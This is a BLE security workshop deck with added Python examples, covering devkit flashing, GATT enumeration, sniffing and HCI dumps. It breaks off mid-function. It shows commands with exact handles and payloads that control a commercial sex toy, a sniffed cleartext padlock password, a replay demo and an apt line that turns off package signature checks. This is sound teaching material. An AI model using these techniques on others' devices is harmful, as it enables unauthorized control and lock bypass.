
Sławomir Jasek

[Link]@[Link]
@slawekja

BLE security essentials

[Link], Hague, 13.09.2018


Sławomir Jasek – short Sławek [suaveck]

Enjoying appsec (dev, break, build...) since 2003.

Pentesting, consulting, training - web, mobile, embedded, ...

Trainings, workshops, tutorials:

[Link]

A significant part of my time goes to research.


How much can we fit in a 2-hour workshop?

Bluetooth Smart?
Our hardware – flashing, embedded development
BLE advertisements, connections, services, characteristics
Sniffing BLE
BLE „Man in the Middle”, relay, replay
BtleJacking
General idea

Workshop for BLE beginners.

Most exercises can be repeated later at home using the provided hardware.
Bluetooth Smart?
AKA Bluetooth 4, Bluetooth Low Energy (BLE).
One of the fastest-growing IoT technologies of recent years.
Completely different from classic Bluetooth 2.x/3.x (BR/EDR).
Designed from the ground up for low energy usage and simplicity (rather than throughput).
The main usage scenarios:
a) Advertising (broadcast)
b) Communication between 2 devices (central / peripheral)
It’s magic...

[Link]
[Link]
Startups
1. Come out with a bright idea where to put a chip in.
2. Buy a BLE devkit, some soldering, integrate a mobile app.
3. Convincing website + video (bootstrap).
4. Crowdfunding!
5. Profit! [Link]
[Link]
[Link]
[Link]
Fuze card: emulates magnetic stripe credit cards

[Link]
BLE DEVKIT
Why do I want you to become an embedded developer?

Have your own device, created yourself, for stable exercises.
Possibility to tamper with various options, settings, ...
The best way to understand what happens „under the hood” and why so many devices remain insecure.
Challenge: secure the default code.
Our hardware set

BLE400 + nRF51822
USB BLE adapters

ST-Link V2
USB UART
Connector wires
Why nRF51822?

- Cheap (below $3 on Aliexpress)
- Easy to develop custom firmware using the online [Link] compiler and ready templates
- Easy to flash using a $5 ST-Link or Raspberry Pi GPIO
- Works as a BLE RF sniffer (Nordic nRF Sniffer firmware)
- Works with the open-source BtleJack (sniffing/hijacking)


BLE400 nRF51822 eval kit

[Link]

• BLE400 motherboard

• nRF51822 Core module


• Aliexpress: starting at $11
Components

nRF51822 Core module:
- nRF51822 chip
- integrated antenna
- pinout (2 mm)
- starting at $2.75

BLE400 motherboard:
- USB UART interface
- pinout (standard 2.54 mm), various other connectors
- jumpers, LEDs, buttons
- starting at $9
[Link]

Free online compiler (free account required)

[Link]

Once logged in, open the nRF board page:

[Link]
Add board
Now back in the compiler
New->New Program, choose template
Hello world = blinky
Blinky source
Blinky [Link] – blinks LED1 a few times a second
Compile

Resulting compiled hex firmware, to flash the module
Note

Recently on [Link] you may encounter problems with online compilation of the examples (known bug, should be resolved soon).

Source files for the „smartlockpicking” device are in the VM:

nrf/smartlockpicking/smartlockpicking_uvision5_nrf51822.zip

You can import this zip into [Link] (it will compile without error). You can also use the offline mbed CLI or another IDE (e.g. Keil).
Flashing nRF51822 module

Can be flashed using SWD:
- STM32 debugger hardware (e.g. ST-Link V2)
- Raspberry Pi GPIO
ST-Link V2

Non-original starting at $5
Works with open-source software: openocd ([Link])
Connect ST-Link to BLE400

SWDIO – SWIO
SWCLK – SWD
GND – GND
3.3V unconnected, we’ll power the board over USB
Connect BLE400
Openocd (already installed)

Kali Linux (already in your VM):

# apt-get install openocd
Openocd – parameters

root@kali:~# openocd -f /usr/share/openocd/scripts/interface/[Link] -f /usr/share/openocd/scripts/target/[Link]

First -f: select ST-Link V2 as the interface. Second -f: connect to the nRF51 target.
Start openocd ready script in your VM

root@kali:~# ./[Link]
Ready-to-use script [Link] in your VM

Successfully connected
Troubleshooting: bad connection

cortex_m reset_config sysresetreq
adapter speed: 1000 kHz
Info : BCM2835 GPIO JTAG/SWD bitbang driver
Info : SWD only mode enabled (specify tck, tms, tdi and tdo gpios to add JTAG mode)
Info : clock speed 1001 kHz
Info : SWD DPIDR 0x00000001
Error: Could not initialize the debug port

1. Have you powered the board via USB?
2. Check your wiring
(DPIDR 0x00000001 is not a valid debug-port ID; the nRF51's Cortex-M0 SW-DP reports 0x0bb11477, so openocd never reached the chip.)
Connect to Openocd console

Openocd listens on TCP/4444. Open new terminal, connect


using telnet:
root@kali:~# telnet localhost 4444
Trying ::1...
Trying [Link]...
Connected to localhost.
Escape character is '^]'.
Open On-Chip Debugger
>
Openocd: „format” flash

Open On-Chip Debugger


> halt
target halted due to debug-request, current mode: Handler HardFault
xPSR: 0xa1000003 pc: 0x0001c320 msp: 0x20003ea8
> nrf51 mass_erase
nRF51822-QFAC(build code: A1) 256kB Flash
> reset
> halt
target halted due to debug-request, current mode: Handler HardFault
xPSR: 0xc1000003 pc: 0xfffffffe msp: 0xffffffd8
Openocd – write firmware to flash
Choose your ID
> flash write_image nrf/smartlockpicking/[Link]
Padding image section 0 with 2112 bytes
Padding image section 1 with 2856 bytes
using fast async flash loader. This is currently supported
only with ST-Link and CMSIS-DAP. If you have issues, add
"set WORKAREASIZE 0" before sourcing [Link] to disable it
target halted due to breakpoint, current mode: Handler HardFault
xPSR: 0x61000003 pc: 0x2000001e msp: 0xffffffd8
wrote 126572 bytes from file nrf/smartlockpicking/[Link] in 3.117295s
(39.652 KiB/s)
> reset

Success = the "wrote ... bytes from file" line.
Reset the device, the new firmware will start running, the LED should blink.
In case of trouble...

Padding image section 0 with 2112 bytes
Padding image section 1 with 2856 bytes
using fast async flash loader. This is currently supported
only with ST-Link and CMSIS-DAP. If you have issues, add
"set WORKAREASIZE 0" before sourcing [Link] to disable it
timeout waiting for algorithm, a target reset is recommended
Failed to write to nrf51 flash
error writing to flash at address 0x00000000 at offset 0x00000000
... try again with reset and halt

> reset
> halt
target halted due to debug-request, current mode: Handler HardFault
xPSR: 0xc1000003 pc: 0xfffffffe msp: 0xffffffd8
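The whole openocd procedure above (halt, mass_erase, reset, halt, write, reset, and the "try again with reset and halt" recovery) scripted in one place. This is an added example, not a script from the workshop VM: it runs openocd in batch mode with -c commands instead of the telnet console, adds verify_image as a check before resetting, and decides what to do from the messages openocd prints on the slides. The config file names interface/stlink-v2.cfg and target/nrf51.cfg are assumptions (the exact names used in the workshop are not preserved on this page); point them at whatever your [Link] script uses.

```python
"""Added example: flash an nRF51822 with openocd from Python, with retry on flash-loader timeout."""
import subprocess
import sys

INTERFACE_CFG = "interface/stlink-v2.cfg"   # assumed name; adjust to the file the workshop script uses
TARGET_CFG = "target/nrf51.cfg"             # assumed name, see lead-in


def flash_commands(hex_path, erase=True):
    """Console sequence from the slides (halt, mass_erase, reset, halt, write, reset),
    with verify_image added so an incomplete write is caught before the device restarts."""
    cmds = ["init", "halt"]
    if erase:
        cmds += ["nrf51 mass_erase", "reset", "halt"]
    cmds += [f"flash write_image {hex_path}", f"verify_image {hex_path}", "reset", "shutdown"]
    return cmds


def openocd_argv(commands):
    """Batch mode: every console command becomes a -c argument, no telnet session needed."""
    argv = ["openocd", "-f", INTERFACE_CFG, "-f", TARGET_CFG]
    for cmd in commands:
        argv += ["-c", cmd]
    return argv


def classify(output, returncode=0):
    """Map openocd's output (the messages shown on the slides) to ok / retry / error."""
    if "timeout waiting for algorithm" in output or "Failed to write" in output:
        return "retry"                      # the "try again with reset and halt" case
    if "Could not initialize the debug port" in output or returncode != 0:
        return "error"                      # unpowered board, bad wiring, or verify/flash failure
    if "wrote " in output and " bytes from file " in output:
        return "ok"
    return "error"                          # no write confirmation at all


def flash(hex_path, runner=subprocess.run, attempts=2):
    """Flash once; on a flash-loader timeout retry with reset+halt but without a second mass_erase."""
    outcome = "error"
    for attempt in range(attempts):
        proc = runner(openocd_argv(flash_commands(hex_path, erase=(attempt == 0))),
                      capture_output=True, text=True)
        outcome = classify(proc.stdout + proc.stderr, proc.returncode)
        if outcome != "retry":
            break
    return outcome


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: flash_nrf51.py <firmware.hex>")
    print(flash(sys.argv[1]))
```

The retry deliberately skips the second mass_erase: the slides recover with reset + halt + write only, and a failed write after a successful erase leaves nothing worth erasing again.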


BLE ADVERTISEMENTS
BLE broadcast -> receive advertisement

Public, by design available to everyone in range
(with the exception of directed advertisements, not widely used in practice)
Mobile apps

Android:
nRF Connect for Mobile
[Link]ps/details?id=[Link]

iOS:
nRF Connect for Mobile
[Link]ocate-beacon/id738709014
LightBlue
[Link]ightblue-bluetooth-low-energy/id557428110
Your device advertisement in nRF Connect

0x08 – shortened local name
Advertisement data

Devices broadcast data formatted according to the „Generic Access Profile” specification: a list of AD structures, each one byte of length, one byte of type („header” value) and the payload. Example types:

0x08 «Shortened Local Name»
0x09 «Complete Local Name»
0x16 «Service Data»
0xFF «Manufacturer Specific Data»

Beacon values, manufacturer-proprietary data, ... travel in Service Data / Manufacturer Specific Data.

[Link]
Linux – interacting with BLE

BlueZ, command-line tools, scripting languages...

Hardware: BLE USB dongle

CSR8510 – most common, good enough, ~ 5 EUR

Other chips (often built into laptops)
• Intel, Broadcom, Marvell...
• May be a bit unstable (e.g. with MAC address change)

Power:
• Class II – 2.5 mW, 10 m range – most common
• Class I – 100 mW, 100 m range – more expensive, actually not necessary
Update: Kali 2018.3 VM problem

You may experience instability with external USB BLE adapters in the Kali Linux 2018.3 VM (the one provided for the workshop).
Example symptom:

Multiple tools may unexpectedly „hang” or not work correctly (hcitool lescan, gatttool, gattacker, bleah, ...).
Update: Kali 2018.3 VM problem

Suspected cause: new Linux kernel

[Link]

Solution:
- use Kali 2018.2 with the previous kernel 4.15
- downgrade the kernel to 4.15 manually
Downgrade kernel to 4.15 manually

1. Edit /etc/apt/[Link] and add the following line:

deb [allow-insecure=yes] [Link] 2018.2 main
(allow-insecure=yes turns off repository signature verification for this source; use it only for this one-off downgrade and remove the line afterwards.)
2. Update the repositories
# apt-get update
3. Install kernel 4.15:
# apt-get install linux-image-4.15.0-kali2-amd64
(...)
Install these packages without verification? [y/N] y
Downgrade kernel to 4.15 – boot

4. Boot into the 4.15 kernel.

Choose „Advanced options (...)” during boot, then „Linux 4.15...”
Turn off sharing Bluetooth devices with host

Turn off
Connect „Cambridge Silicon Radio” to VM

root@kali:~# hciconfig
hci0: Type: BR/EDR Bus: USB
BD Address: [Link] ACL MTU: 310:10 SCO MTU: 64:8
UP RUNNING
RX bytes:568 acl:0 sco:0 events:29 errors:0
TX bytes:357 acl:0 sco:0 commands:30 errors:1

root@kali:~# hciconfig hci0 up

root@kali:~# hciconfig hci0 version
hci0: Type: BR/EDR Bus: USB
BD Address: [Link] ACL MTU: 310:10 SCO MTU: 64:8
HCI Version: 4.0 (0x6) Revision: 0x22bb
LMP Version: 4.0 (0x6) Subversion: 0x22bb
Manufacturer: Cambridge Silicon Radio (10)
The device advertisement

root@kali:~# hcitool lescan


LE Scan ...
[Link] smartlockpicking01
[Link] (unknown)
[Link] smartlockpicking01
[Link] (unknown)
Bleah

[Link]
[Link]
# bleah
Your device advertisement in bleah

root@kali:~# bleah
Introducing GATTacker – [Link]

Open source
[Link]
Websockets
Modular design
Json
.io website

And a cool logo!


Install in current Kali (since 2018.2)

root@kali:~# apt-get install nodejs npm


root@kali:~# npm install gattacker
Step 1 – run ws-slave module

[diagram: the ws-slave (BLE side) receives advertisements; [Link] stores them as JSON]
Running the ws-slave (client)

root@kali:~# cd node_modules/gattacker

root@kali:~/node_modules/gattacker# node [Link]

GATTacker ws-slave
Step 2 – scan (connecting to ws-slave)

[diagram: scan connects to the ws-slave over websockets and writes advertisement JSON files]
Scan for advertisements

root@kali:~/node_modules/gattacker# node [Link]

Ws-slave address: [Link]
on open
poweredOn
Start scanning.
Troubleshooting

root@kali:~/node_modules/gattacker# node scan
Ws-slave address: [Link]
on open
poweredOff

poweredOff = your BLE adapter is off:
# hciconfig hci0 up
[Link]

# node [Link]
connects to the ws-slave,
listens to all advertisements,
saves them automatically to JSON files (devices/ subdir).
GATTacker: scan for devices

Device MAC
The advertisement file

Node_modules/gattacker/devices/<MAC>_<name>.[Link]
"id": "d0c92e6350b3",
"eir": "0201041308736d6172746c6f636b7069636b696e673031",
"scanResponse": null,
"decodedNonEditable": {
"localName": "smartlockpicking01",
"manufacturerDataHex": null,
"manufacturerDataAscii": null,
"serviceUuids": []
}

"eir" / "scanResponse": raw hex data (formatted according to the BLE spec), used later for emulation.
"decodedNonEditable": decoded just for display; editing it changes nothing.
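The AD-structure format from the „Advertisement data” slide, applied to the raw "eir" hex in the advertisement file above. This is an added example, not GATTacker's own decoder: it walks the length/type/payload structures and rebuilds the decodedNonEditable fields (local name, manufacturer data, 16-bit service UUIDs, plus the Flags byte). WORKSHOP_EIR is the value shown in the file above; CONSTRUCTED_EIR is made up here to exercise the other AD types (the company ID and payload in it are arbitrary).

```python
"""Added example: parse raw BLE advertising data (the GATTacker "eir" hex) into AD structures."""

AD_FLAGS, AD_UUID16_INCOMPLETE, AD_UUID16_COMPLETE = 0x01, 0x02, 0x03
AD_NAME_SHORT, AD_NAME_COMPLETE = 0x08, 0x09
AD_SERVICE_DATA16, AD_MANUFACTURER = 0x16, 0xFF

FLAG_BITS = {0x01: "LE Limited Discoverable", 0x02: "LE General Discoverable",
             0x04: "BR/EDR Not Supported"}


def parse_ad_structures(data: bytes):
    """Return [(ad_type, payload), ...]. Each structure is <length><type><payload>,
    where length counts the type byte and the payload but not itself."""
    out, i = [], 0
    while i < len(data):
        length = data[i]
        if length == 0:
            break                                   # zero padding ends the significant part
        if i + 1 + length > len(data):
            raise ValueError(f"AD structure at offset {i} runs past the end of the data")
        out.append((data[i + 1], bytes(data[i + 2:i + 1 + length])))
        i += 1 + length
    return out


def decode_eir(eir_hex: str, scan_response_hex: str = "") -> dict:
    """Mirror the decodedNonEditable block of the GATTacker advertisement file."""
    decoded = {"localName": None, "manufacturerDataHex": None,
               "manufacturerDataAscii": None, "serviceUuids": [], "flags": []}
    raw = bytes.fromhex(eir_hex) + bytes.fromhex(scan_response_hex)
    for ad_type, payload in parse_ad_structures(raw):
        if ad_type in (AD_NAME_SHORT, AD_NAME_COMPLETE):
            decoded["localName"] = payload.decode("utf-8", errors="replace")
        elif ad_type == AD_MANUFACTURER:
            decoded["manufacturerDataHex"] = payload.hex()    # first 2 bytes: company ID, little-endian
            decoded["manufacturerDataAscii"] = payload.decode("ascii", errors="replace")
        elif ad_type in (AD_UUID16_INCOMPLETE, AD_UUID16_COMPLETE):
            # 16-bit UUIDs go over the air little-endian: bytes 0f 18 mean 0x180F
            decoded["serviceUuids"] += [payload[j:j + 2][::-1].hex()
                                        for j in range(0, len(payload) - 1, 2)]
        elif ad_type == AD_FLAGS and payload:
            decoded["flags"] = [name for bit, name in FLAG_BITS.items() if payload[0] & bit]
    return decoded


# The "eir" value of the smartlockpicking01 advertisement file shown above.
WORKSHOP_EIR = "0201041308736d6172746c6f636b7069636b696e673031"
# Constructed, not captured: Flags 0x06, complete 16-bit UUID list with 0x180F,
# manufacturer data with an arbitrary company ID 0x0059 and payload 01 02.
CONSTRUCTED_EIR = "020106" + "03030f18" + "05ff59000102"

if __name__ == "__main__":
    for eir in (WORKSHOP_EIR, CONSTRUCTED_EIR):
        print(eir, "->", decode_eir(eir))
```

Because the emulated device later re-broadcasts the raw "eir" bytes, edits to the advertisement must be made in this hex (re-encoding the structure with the right length byte), not in the decoded fields.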
Sex toys...

[Link]
locating-and-exploiting-smart-adult-toys/ [Link]
„Screwdriving”

Devices just announce their name.
You don’t need any tools to see it.
„Screwdriving”

List of the sex toys’ Bluetooth names:
[Link]
Screwdriver/blob/master/Device_List.txt

We’ll get back to these devices later.


BLE SERVICES
BLE central <-> peripheral

[diagram: central (phone/laptop) connected over BLE to peripheral (device)]
Services, characteristics, ...

Service – groups several characteristics (e.g. 0x180F – Battery Service)

Characteristic – contains a single value
Properties – read/write/notify... (authenticated or not)
Value – the actual value

Descriptor – additional data attached to a characteristic, e.g. a user description string (“Battery level”) or the notification subscription status
Your „smartlockpicking” device

You will connect to your „smartlockpicking” device using the nRF Connect mobile application.
Services in nRF Connect

[screenshot: list of services, e.g. 0x180F – Battery]
Device characteristics (in service)

[screenshot: characteristics within a service, with their properties: read, write, notify]
Reading, writing, notifications

Each characteristic has properties: read/write/notify
Can be combined (e.g. read+notify, read+write, ...)

Read/write – transmit a single value

Notifications
• Getting more data or receiving periodic updates from a device
• The central device subscribes to a specific characteristic, and the peripheral device sends data asynchronously
Read characteristic in nRF Connect

Our LED switching service with 2 characteristics.
Read value: in our device, the current LED status.
Write to characteristic in nRF Connect

Write 01: turns on the LED
Linux: device advertisement

root@kali:~# hcitool lescan
LE Scan ...
[Link] smartlockpicking01
[Link] (unknown)
[Link] smartlockpicking01
[Link] (unknown)

First column: MAC address
gatttool – BlueZ command-line interface

root@kali:~# gatttool -I -b [Link] -t random

[Link][LE]>

-I: interactive; -b: your device MAC address; -t random: the device advertises a random MAC address type
Connect to it from Kali - gatttool

root@kali:~# gatttool -I -b [Link] -t random
[Link][LE]> connect
Attempting to connect to [Link]
Connection successful
[Link][LE]>

Blue prompt = connected
Troubleshooting

Check if your BLE adapter is up
# hciconfig hci0
Troubleshooting v2

a) Start the Bluetooth service
# systemctl start bluetooth
b) Try with the random address type
# gatttool -I -b <MAC> -t random
Read characteristic value

[Link][LE]> char-read-hnd 0x03

0x03 = handle for 0x2a00 (Device Name)
Reading characteristics

Read value from characteristic, using handle

[Link][LE]> char-read-hnd 0x03

The value is returned as hex; decode it to ASCII, e.g. in CyberChef

[Link]
Toggle the LED status

The characteristics that switch the LEDs, as visible in

[Link][LE]> characteristics

Handles 0x0025, 0x0027
Toggle the LED status

char-write-req <handle> <value>:
[Link][LE]> char-write-req 0x25 01
[Link][LE]> char-write-req 0x25 00
[Link][LE]> char-write-req 0x27 01
[Link][LE]> char-write-req 0x27 00
Our sex toy: writing to characteristics
Writing to characteristics

Let’s vibrate our sex toy!

root@kali:~# gatttool -I -b [Link]
[Link][LE]> connect
[Link][LE]> char-write-cmd 0x36 c5552daa

We will explain later how we got these values (handle and data).
Enumerate services + characteristics in bleah

root@kali:~# bleah -b [Link] -e

-b: your MAC
Bleah vs sex toy (enumerate services)
Bleah vs sex toy: vibrate

Using bleah: -b <MAC> -n <handle> -d <data>

root@kali:~# bleah -b [Link] -n 0x36 -d c5552daa
GATTacker

1) Run the ws-slave
2) Run scan – without parameters it just scans for all advertisements, finds all the devices nearby
3) Run scan for a specific device (MAC) – scans the device services and characteristics to a JSON file
GATTacker

[diagram: ws-slave receives advertisements and explores services; [Link] writes advertisement JSON and services JSON]
GATTacker: running the ws-slave (client)

$ cd node_modules/gattacker
~/node_modules/gattacker $ sudo node [Link]

GATTacker ws-slave
GATTacker: scan for devices

Device MAC
Scan specific device characteristics

root@kali:~/node_modules/gattacker# node scan f4b85ec06ea5

(argument: target device MAC)
Ws-slave address: <your_slave_ip>
on open
poweredOn
Start exploring f4b85ec06ea5
Start to explore f4b85ec06ea5
explore state: f4b85ec06ea5 : start
explore state: f4b85ec06ea5 : finished
Services file devices/[Link] saved!
Json services file
(devices/<MAC....>.[Link])

{
"uuid": "1800",
"name": "Generic Access",
"type": "[Link].generic_access",
"startHandle": 1,
"endHandle": 11,
"characteristics": [
{
"uuid": "2a00",
"name": "Device Name",
"properties": [
"read"
],
"value": "5061646c6f636b21",
"descriptors": [],
"startHandle": 2,
"valueHandle": 3,
"asciiValue": "Padlock!"
},
(...)

One object per service; each lists its characteristics with uuid, properties, handles, descriptors and the value read during the scan.
BLE SNIFFING
Hacking challenge – steal a car!
How do we hack it?

[diagram: central <-> BLE <-> peripheral; passive sniffing of the air?]
Bluetooth 4 security (specification)

Pairing
Key Generation
Encryption
Encryption in Bluetooth LE uses AES-CCM cryptography. Like BR/EDR, the LE Controller
will perform the encryption function. This function generates 128-bit encryptedData
from a 128-bit key and 128-bit plaintextData using the AES-128-bit block cypher as
defined in FIPS-197.
Signed Data
[Link]
Bluetooth 4 security (specification)

„The goal of the low energy security mechanism is to protect communication between devices at different levels of the stack.”
• Man-in-the-Middle (MITM)
• Passive Eavesdropping
• Privacy/Identity Tracking
Bluetooth 4.0 - pairing
Pairing (once, in a secure environment)
• Just Works – most common; devices without a display or keyboard cannot implement anything else
• Passkey Entry (6-digit PIN) – if the device has a display
• Out of band – not yet spotted in the wild
Establish a Long Term Key and store it to secure future communication ("bonding")
"Just Works and Passkey Entry do not provide any passive eavesdropping protection"
4.2 – elliptic curves (LE Secure Connections, ECDH key agreement)
Mike Ryan, [Link]
BLE security - practice
• 8 of 10 tested devices do not implement BLE-layer encryption
• Pairing is handled at OS level; the mobile application does not have full control over it
• It is troublesome to manage with requirements for:
  • Multiple users/application instances per device
  • Access sharing
  • Cloud backup
• Usage scenario does not allow for secure bonding (e.g. public cash register, "fleet" of beacons, car rental)
• Other hardware/software/UX problems with pairing
• Vendors "forget" to do it, or do not consider clear-text transmission a problem
BLE security - practice
Security in the "application" layer (GATT)
Various authentication schemes
• Static password/key
• Challenge-response (most common)
• „PKI”
Requests/responses encryption
No single standard, library or protocol
Own crypto, usually based on AES
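The first two application-layer schemes listed above, modelled on the GATT write/notify calls a phone would make, so the difference shows up in code: a value sniffed from a static-password characteristic is the credential and can be re-sent, a response bound to a fresh nonce cannot. This is an added example, not code from the workshop or from any vendor firmware. The key, the 8-byte nonce length and HMAC-SHA256 are choices made here (the slides only say "own crypto, usually based on AES"; HMAC is used because it needs no extra library).

```python
"""Added example: why a sniffed GATT write replays against a static password but not
against a nonce-based challenge-response. Toy peripherals, not real firmware."""
import hashlib
import hmac
import os


class StaticPasswordLock:
    """Peripheral that opens when the unlock characteristic receives the fixed password."""
    def __init__(self, password: bytes):
        self._password = password
        self.open = False

    def write(self, value: bytes) -> bool:
        self.open = hmac.compare_digest(value, self._password)
        return self.open


class ChallengeResponseLock:
    """Peripheral: notifies a fresh random nonce, expects HMAC(key, nonce) written back."""
    def __init__(self, key: bytes, nonce_len: int = 8):
        self._key, self._nonce_len = key, nonce_len
        self._nonce = None
        self.open = False

    def notify_challenge(self) -> bytes:
        self._nonce = os.urandom(self._nonce_len)   # fresh per session; reusing it is the classic bug
        return self._nonce

    def write(self, value: bytes) -> bool:
        if self._nonce is None:
            return False                             # no outstanding challenge
        expected = hmac.new(self._key, self._nonce, hashlib.sha256).digest()
        self.open = hmac.compare_digest(value, expected)
        self._nonce = None                           # single use: a second write needs a new challenge
        return self.open


def app_response(key: bytes, nonce: bytes) -> bytes:
    """What the legitimate mobile app writes after receiving the challenge notification."""
    return hmac.new(key, nonce, hashlib.sha256).digest()


def replay_attack(lock, captured_write: bytes) -> bool:
    """Attacker re-sends a value sniffed earlier (gatttool char-write / a replayed dump)."""
    if isinstance(lock, ChallengeResponseLock):
        lock.notify_challenge()                      # the lock issues a new nonce for this session
    return lock.write(captured_write)


def demo() -> dict:
    key = b"constructed-shared-key"                  # constructed value
    # 1) static password: the sniffed write is the credential itself
    static = StaticPasswordLock(b"12345678")
    sniffed = b"12345678"                            # as read off a sniffed write request
    static_legit = static.write(sniffed)
    static_replay = replay_attack(StaticPasswordLock(b"12345678"), sniffed)
    # 2) challenge-response: the sniffed write is bound to a nonce that will not recur
    cr = ChallengeResponseLock(key)
    sniffed_cr = app_response(key, cr.notify_challenge())
    cr_legit = cr.write(sniffed_cr)
    cr_replay = replay_attack(ChallengeResponseLock(key), sniffed_cr)
    return {"static_legit": static_legit, "static_replay": static_replay,
            "cr_legit": cr_legit, "cr_replay": cr_replay}


if __name__ == "__main__":
    print(demo())
```

Note what challenge-response does not buy: the shared key still sits in the app, so hooking the app (see the Frida slides) or extracting it from the APK gives the attacker the same capability as the phone; and a peripheral that issues the same "nonce" every time degrades back to the static case.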
Sniffing – BLE RF essentials
Advertisement channels

[Link]
BLE channel hopping

37 channels for data, 3 for advertisements
Sniffing: catch the initial packet and follow the channel hopping

[Link]
y-mikeryan-usenix_woot_2013-[Link]
Catching initial packet to follow

A connection starts at one of the 3 advertisement channels.
A device can limit the channels it uses, but usually uses all 3 and can start at any of them.
Catching the initial packet:
- Sniff all 3 advertising channels at once
- Sniff just one channel and have luck
Pro devices ($$$) – scan the whole spectrum

Ellisys Bluetooth Explorer 400 – All-in-One Bluetooth® Protocol Analysis System
[Link]
ComProbe BPA® 600 Dual Mode Bluetooth® Protocol Analyzer
[Link]
Software Defined Radio

BLE SDR sniffer for HackRF One:
[Link]
Passive sniffing – Ubertooth ($120)

Open-source (software, hardware).
External antenna.
RF-level sniffing, possible to inspect in Wireshark.
Can be combined in 3 to cover all advertising channels.

[Link]
Nordic BLE sniffer

Turn an nRF device (e.g. devkit) into a sniffer.
[Link]
energy/nRF-Sniffer
Adafruit Bluefruit LE sniffer ($25)
[Link]
Turn our BLE module into a sniffer

Same nRF51822, a bit cheaper than Adafruit.
Needs to be flashed with the sniffer firmware.
New version 2.0.0-beta available here.
[Link]
Our „smartlockpicking” device

Take the module out of the BLE400 board, it will now work as a standalone device.
Just VCC (3V, not 5!) and GND.
Our „smartlockpicking” device can work standalone

Just connect VCC (3V) and GND; you can use the BLE400 as the power source.
2 mm -> 2.54 mm wires required

VCC GND
BTW, you can connect an external USB TTL adapter
External USB TTL

RXD->P09
TXD->P011
3V (NOT 5!) VCC
GND
Now put the second module in the board to flash

Second module: to be flashed with the sniffer firmware.
Standalone „smartlockpicking” device: just powered from the board.
Flash second module with a sniffer firmware

> halt
> nrf51 mass_erase
> reset
> halt
> flash write_image
nrf/sniffer/sniffer_pca10028_51296aa.hex
(...)
> reset
Setting up the sniffer – connect to USB

root@kali:~# dmesg
(...)
[25958.451531] usb 2-2.2: new full-speed USB device number 10 using
uhci_hcd
[25958.707592] usb 2-2.2: New USB device found, idVendor=10c4,
idProduct=ea60
[25958.707596] usb 2-2.2: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[25958.707598] usb 2-2.2: Product: CP2102 USB to UART Bridge Controller
[25958.707600] usb 2-2.2: Manufacturer: Silicon Labs
[25958.707601] usb 2-2.2: SerialNumber: 0001
[25958.713131] cp210x 2-2.2:1.0: cp210x converter detected
[25958.717133] usb 2-2.2: cp210x converter now attached to ttyUSB0
Wireshark installation #1 (already in your VM)

Help->About->Folders
Check the Extcap path
Wireshark #2 install extcap (already in your VM)

Unzip the sniffer downloaded from Nordic:

root@kali:~/nrf_sniffer_2.0.0-beta-1_51296aa/extcap# ls
nrf_sniffer.bat nrf_sniffer.py SnifferAPI

root@kali:~/nrf_sniffer_2.0.0-beta-1_51296aa/extcap# cp -r * /usr/lib/x86_64-linux-gnu/wireshark/extcap/
Wireshark install #3 – turn on interface toolbar

View-> Interface Toolbars -> nRF Sniffer
Wireshark

nRF Sniffer toolbar: your sniffer device is detected properly; click the interface to start sniffing.
Without a device filter you get tons of advertisements.
Filter specific device
[Link]
Let’s try to sniff the „Padlock!” device
The advertising channels again
Advertisement channels

[Link]
Limit the channels for sniffing

To maximize the chance of catching a connection, you can have 3 independent sniffers, each set to a specific channel.
Limit the channel on your sniffer to only 37, or 38, or 39.
„btatt”: display filter that hides the advertisements and shows only ATT traffic (read/write, ...)
Filter only write requests ([Link] == 0x12)

Find a write packet, right-click on Opcode (Write Request) and apply as filter
Gotcha!

„12345678” – cleartext password


Quicklock hack is brought to you by Antony Rose

[Link]
Manufacturer’s statement

The electronic codes necessary to open are passed wirelessly and are
unencrypted (by design) to allow vendors flexibility when integrating the
bluetooth device into existing platforms. Because keys are passed wirelessly,
they are open to Bluetooth hacking only for a few seconds, when a hacker is
within range of the device. However, this level of security is similar to a
standard lock and key scenario! Standard mechanical devices offer far fewer
benefits than Bluetooth connected locks!

[Link]
ANDROID HCIDUMP
„WHITEBOX” APPROACH
How do we hack BLE?

[diagram: central <-> BLE <-> peripheral; passive sniffing on the air, HCI dump on the central]
Android HCI dump – white box approach

1. Enable Developer options in Android
About phone->Build number-> tap until „You are now a developer!”
2. Settings->Developer options->Enable Bluetooth HCI log
The file is saved in /sdcard/btsnoop_hci.log
Readable in Wireshark
Host Controller Interface

Linux (BlueZ), Android...

# hcidump
Hcidump

Dumps commands and data exchanged between the host OS and the adapter firmware.

You will see only public advertisements and the data exchanged with your host.

In case of link-layer encryption, hcidump shows the unencrypted data (encryption happens in the controller).

Does not dump raw RF packets.
BLE-Replay by NCC

[Link]
Parses hcidump to JSON, wraps it into a Python BLE client for replay/fuzzing
Example btsnoop_hci.log for our padlock
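The Wireshark step from the sniffing section (filter on the Opcode field, btatt.opcode == 0x12, to see the write requests) done on the Android btsnoop_hci.log instead, so it can be scripted the way BLE-Replay does. This is an added example, not code from the workshop or from NCC's tool: it reads the btsnoop file header and records, unwraps H4 -> HCI ACL -> L2CAP (CID 4) -> ATT, and lists the Write Requests. SAMPLE_BTSNOOP is constructed with the same framing helpers, not a real capture; the handles and the "12345678" payload are illustrative.

```python
"""Added example: list ATT Write Requests from an Android btsnoop_hci.log."""
import struct

BTSNOOP_MAGIC = b"btsnoop\x00"
DATALINK_H4 = 1002            # "HCI UART (H4)": every packet starts with a type byte
H4_ACL = 0x02
L2CAP_CID_ATT = 0x0004        # fixed LE channel for the Attribute Protocol
ATT_NAMES = {0x0a: "Read Request", 0x0b: "Read Response", 0x12: "Write Request",
             0x13: "Write Response", 0x1b: "Handle Value Notification", 0x52: "Write Command"}
ATT_WITH_HANDLE = {0x0a, 0x12, 0x1b, 0x52}   # PDUs carrying a 2-byte handle after the opcode


def parse_btsnoop(blob: bytes):
    """Return [(flags, timestamp_us, packet)] for every record in the file."""
    if blob[:8] != BTSNOOP_MAGIC:
        raise ValueError("not a btsnoop file")
    version, datalink = struct.unpack(">II", blob[8:16])
    if version != 1 or datalink != DATALINK_H4:
        raise ValueError(f"unsupported btsnoop version/datalink {version}/{datalink}")
    records, off = [], 16
    while off + 24 <= len(blob):
        # record header: original length, included length, flags, cumulative drops, timestamp
        _orig, incl, flags, _drops, ts = struct.unpack(">IIIIq", blob[off:off + 24])
        off += 24
        records.append((flags, ts, blob[off:off + incl]))
        off += incl
    return records


def att_pdus(records):
    """Decode first-fragment ACL packets on the ATT channel into (direction, opcode, handle, value)."""
    out = []
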